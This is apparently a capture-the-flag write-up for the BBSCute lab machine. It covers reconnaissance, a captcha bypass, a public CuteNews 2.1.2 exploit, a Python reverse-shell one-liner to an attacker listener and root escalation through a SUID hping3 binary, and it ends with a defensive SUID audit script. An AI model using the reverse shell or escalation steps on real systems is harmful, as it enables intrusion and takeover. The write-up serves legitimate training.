
# BBSCute

## Nmap

```
sudo nmap 192.168.120.128 -p- -sS -sV

22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
88/tcp  open  http     nginx 1.14.2
110/tcp open  pop3     Courier pop3d
995/tcp open  ssl/pop3 Courier pop3d
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Navigating to port 80 in the browser lands us on the default install page for Apache.

![](/files/-MXIIlLvIdbdFnu0ALNW)

Running `dirsearch.py` against the target web servers reveals `index.php`.

```
python3 dirsearch.py -u http://192.168.120.128 -w /usr/share/seclists/Discovery/Web-Content/common.txt -r -t 60 --full-url
```

![](/files/-MXIIxl749yPPlTmwoIp)

`index.php` takes us to the login page for CuteNews. I tried some default credentials and was unable to access the system.

![](/files/-MXIJ5rhWdIedAjzIdB5)

Instead, we can register ourselves as a new user to gain access. On the new user registration page the captcha fails to load, which stops us from proceeding:

![/index.php?register](/files/-MXIJYgE2p5GBgr5o3S6)

Reviewing the source of this page shows we do have a link for captcha.php.

![](/files/-MXIJolSZs8iGsxPxxb4)

Viewing this will show what the current captcha should be.

![/captcha.php](/files/-MXIK67Gr7zNcqvRazYA)

Entering this into the registration field will allow us to proceed with new user creation.

![](/files/-MXIKHigSN64BSr2VUvg)

We can see that we are running CuteNews 2.1.2 as per the footer of the page. Searching for exploits with `searchsploit` shows the results below.

![](/files/-MXINbV42dq4tBEbiF8A)

Searching further on Google for exploits we come across a PoC on GitHub located here: <https://github.com/CRFSlick/CVE-2019-11447-POC>.

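Download the Python script and the `sad.gif` file to the same directory. Run with the syntax shown below, where `<poc_script>.py` is a placeholder for the script downloaded from the repository.

```
python3 <poc_script>.py <User> <Pass> http://192.168.120.128/index.php
```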

![](/files/-MXIpGzstxFADzC0GBUA)

We can now run the following command to get a more usable reverse shell on a different listener:

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.120",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
```

![](/files/-MXIqw09jqzzcswUJhcc)

From here I uploaded `linpeas`, which after executing identified the binary `hping3` as having the SUID bit set, meaning we can execute the binary with root permissions.

![](/files/-MXIvhN7sei7cHxuEll5)

Then, as per [GTFOBins](https://gtfobins.github.io/gtfobins/hping3/), we can execute the binary with the SUID bit set to gain a root shell.

![](/files/-MXIvtXz8NTmF2wb-0It)

```
/usr/sbin/hping3
/bin/sh -p

OR

./hping3
/bin/sh -p
```

![](/files/-MXIw8aNK7Wo98lbgtoC)
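
The SUID bit on `hping3` is the kind of finding a routine audit catches before an attacker does. The following is an added example, not part of the original writeup: a POSIX shell function that reports setuid files missing from a baseline. The allowlist contents, the function name `audit_suid` and the `--scan` argument are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: report setuid files that are not on an expected baseline.
# The baseline below is constructed for illustration; build your own from a
# known-good install of the distribution you run.
SUID_ALLOWLIST="
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
"

# audit_suid ROOT [PREFIX]
#   ROOT   directory to scan (stays on one filesystem because of -xdev)
#   PREFIX path prefix stripped before the allowlist lookup, useful when
#          scanning a mounted image or chroot instead of the live root
# Prints "UNEXPECTED-SUID <path>" for every setuid file not on the baseline,
# whoever owns it. Returns 1 if anything was reported, 0 otherwise.
audit_suid() {
    audit_root=$1
    audit_prefix=${2:-}
    audit_rc=0
    # -perm -4000 matches any regular file with the setuid bit set.
    audit_found=$(find "$audit_root" -xdev -type f -perm -4000 2>/dev/null | sort)
    if [ -z "$audit_found" ]; then
        return 0
    fi
    while IFS= read -r audit_file; do
        audit_rel=${audit_file#"$audit_prefix"}
        # -F fixed string, -x whole line: exact path match only.
        if ! printf '%s\n' "$SUID_ALLOWLIST" | grep -Fxq -- "$audit_rel"; then
            printf 'UNEXPECTED-SUID %s\n' "$audit_rel"
            audit_rc=1
        fi
    done <<EOF
$audit_found
EOF
    return "$audit_rc"
}

# Scan the live root filesystem only when explicitly asked to.
if [ "${1:-}" = "--scan" ]; then
    audit_suid /
fi
```

On this target the audit would flag `/usr/sbin/hping3`; if the binary does not need the bit, `chmod u-s` clears it.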

